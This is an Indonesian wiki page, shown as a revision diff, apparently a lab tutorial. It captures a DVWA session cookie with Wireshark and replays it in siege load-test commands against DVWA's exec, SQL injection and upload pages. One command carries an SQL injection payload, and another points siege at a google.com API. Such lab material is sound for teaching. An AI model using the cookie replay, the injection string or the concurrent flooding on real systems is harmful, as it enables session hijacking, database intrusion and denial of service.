Difference between revisions of "Siege: cookie"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
Line 54: | Line 54: | ||
siege -u http://192.168.88.240/DVWA-1.9/vulnerabilities/sqli/?id=%'+or+'0'='0 --header='Cookie: security=low; PHPSESSID=n4rbm0nva5qatce4c3jp8b8pk1' -d1 -r10 -c25 | siege -u http://192.168.88.240/DVWA-1.9/vulnerabilities/sqli/?id=%'+or+'0'='0 --header='Cookie: security=low; PHPSESSID=n4rbm0nva5qatce4c3jp8b8pk1' -d1 -r10 -c25 | ||
− | + | siege -u http://192.168.88.240/DVWA-1.9/vulnerabilities/exec/ --header='Host: 192.168.88.240, Cookie: security=low; PHPSESSID=n4rbm0nva5qatce4c3jp8b8pk1' -d1 -r10 -c25 | |
− | siege -u http://192.168.88.240/DVWA-1.9/vulnerabilities/exec/ --header='Cookie: security=low; PHPSESSID=n4rbm0nva5qatce4c3jp8b8pk1' -d1 -r10 -c25 | ||
==Contoh lain== | ==Contoh lain== | ||
siege --concurrent=5 --reps=100 --header='sdk:3.0, config:3.0,zid:0' 'https://google.com/api/REGME POST uid=a8qn&aid=43ZK0' | siege --concurrent=5 --reps=100 --header='sdk:3.0, config:3.0,zid:0' 'https://google.com/api/REGME POST uid=a8qn&aid=43ZK0' |
Revision as of 05:45, 7 December 2018
Sadap
Sadap traffic ke web tersebut menggunakan wireshark. Untuk belajar ada baiknya akses ke web DVWA, login dan klik beberapa menu. Paket sebagai berikut
Frame 272: 549 bytes on wire (4392 bits), 549 bytes captured (4392 bits) on interface 0 Linux cooked capture Internet Protocol Version 4, Src: 192.168.88.82, Dst: 192.168.88.240 Transmission Control Protocol, Src Port: 50430, Dst Port: 80, Seq: 1920, Ack: 7175, Len: 481 Hypertext Transfer Protocol GET /DVWA-1.9/vulnerabilities/sqli/ HTTP/1.1\r\n Host: 192.168.88.240\r\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0\r\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n Accept-Language: en-US,en;q=0.5\r\n Accept-Encoding: gzip, deflate\r\n Referer: http://192.168.88.240/DVWA-1.9/vulnerabilities/sqli_blind/\r\n Cookie: security=low; PHPSESSID=n4rbm0nva5qatce4c3jp8b8pk1\r\n Connection: keep-alive\r\n Upgrade-Insecure-Requests: 1\r\n \r\n [Full request URI: http://192.168.88.240/DVWA-1.9/vulnerabilities/sqli/] [HTTP request 5/5] [Prev request in frame: 266] [Response in frame: 273]
Maka Cookie adalah
Cookie: security=low; PHPSESSID=n4rbm0nva5qatce4c3jp8b8pk1\r\n
Jangan matikan browser,
Cookie
Gunakan tambahan header di siege
--header="Cookie: --COOKIE_DATA--" --header="Cookie: security=low; PHPSESSID=n4rbm0nva5qatce4c3jp8b8pk1\r\n"
Run Siege
Buka web DVWA, login, capture Cookie menggunakan Wireshark tambahan di siege --header=
siege -u http://192.168.88.240/DVWA-1.9/vulnerabilities/exec/ --header='Cookie: security=low; PHPSESSID=n4rbm0nva5qatce4c3jp8b8pk1' -d1 -r10 -c25
siege -u http://192.168.88.240/DVWA-1.9/vulnerabilities/sqli/ --header='Cookie: security=low; PHPSESSID=n4rbm0nva5qatce4c3jp8b8pk1' -d1 -r10 -c25
siege -u http://192.168.88.240/DVWA-1.9/vulnerabilities/upload/ --header='Cookie: security=low; PHPSESSID=n4rbm0nva5qatce4c3jp8b8pk1' -d1 -r10 -c25
siege -u http://192.168.88.240/DVWA-1.9/vulnerabilities/sqli/?id=1 --header='Cookie: security=low; PHPSESSID=n4rbm0nva5qatce4c3jp8b8pk1' -d1 -r10 -c25
siege -u http://192.168.88.240/DVWA-1.9/vulnerabilities/sqli/?id=%'+or+'0'='0 --header='Cookie: security=low; PHPSESSID=n4rbm0nva5qatce4c3jp8b8pk1' -d1 -r10 -c25
siege -u http://192.168.88.240/DVWA-1.9/vulnerabilities/exec/ --header='Host: 192.168.88.240, Cookie: security=low; PHPSESSID=n4rbm0nva5qatce4c3jp8b8pk1' -d1 -r10 -c25
Contoh lain
siege --concurrent=5 --reps=100 --header='sdk:3.0, config:3.0,zid:0' 'https://google.com/api/REGME POST uid=a8qn&aid=43ZK0'